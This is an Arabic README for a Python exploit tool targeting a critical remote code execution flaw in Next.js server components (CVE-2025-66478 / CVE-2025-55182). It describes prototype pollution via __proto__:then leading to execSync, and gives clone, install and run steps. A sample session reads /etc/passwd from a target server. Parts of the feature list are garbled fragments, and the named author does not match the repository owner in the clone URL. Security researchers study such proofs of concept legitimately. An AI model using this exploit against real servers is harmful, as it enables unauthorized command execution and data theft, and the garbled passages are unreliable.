
React2Shell (CVE-2025-66478): إثبات مفهوم بلغة بايثون لثغرة تنفيذ تعليمات برمجية عن بعد (RCE) حرجة في مكونات خادم Next.js. يتضمن واجهة سطر أوامر تفاعلية (CLI)، وحقن حمولة مخصصة، وتنسيق مخرجات أنظف. لأغراض البحث التعليمي فقط.
تنفيذ تعليمات برمجية عن بُعد (RCE) في Next.js عبر تلوث النموذج الأولي في مكونات الخادم
يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2025-66478 (المشار إليه أيضًا باسم CVE-2025-55182 في بعض السياقات)، وهو ثغرة أمنية حرجة تؤثر على تطبيقات Next.js التي تستخدم إصدارات محددة من مكونات خادم React (RSC).
من خلال التلاعب بعملية التسلسل (serialization) لمكونات RSC، يمكن لمهاجم غير مصادق عليه حقن حمولة ضارة عبر تلوث النموذج الأولي (__proto__:then). يمكن أن يؤدي ذلك إلى تنفيذ أوامر نظام عشوائية على الخادم من خلال child_process.execSync.
تم التطوير بواسطة: ArkhamKnight47
multipart/form-data.1:E{"digest":...}).\n مقابل \r\n) للحصول على مخرجات نظيفة على أنظمة Windows و Linux المستهدفة.requests# استنساخ المستودع
git clone https://github.com/RavinduRathnayaka/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC
# تثبيت التبعيات
pip install requests
python CVE-2025-66478.py
سيُطلب منك:
http://localhost:3000id, whoami, cat /etc/passwd[?] TARGET URL > http://192.168.1.5:3000
[?] COMMAND > cat /etc/passwd
[*] EXECUTING EXPLOIT...
[+] PAYLOAD SUCCESSFUL. OUTPUT BELOW:
============================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
============================================================
تم توفير هذه الأداة لأغراض تعليمية وبحثية أمنية فقط.
لا يتحمل المؤلف (ArkhamKnight47) أي مسؤولية عن إساءة استخدام هذا الرمز. اختبار هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
استخدم بمسؤولية. تعلم بأخلاقية. قم بتأمين مجموعتك التقنية.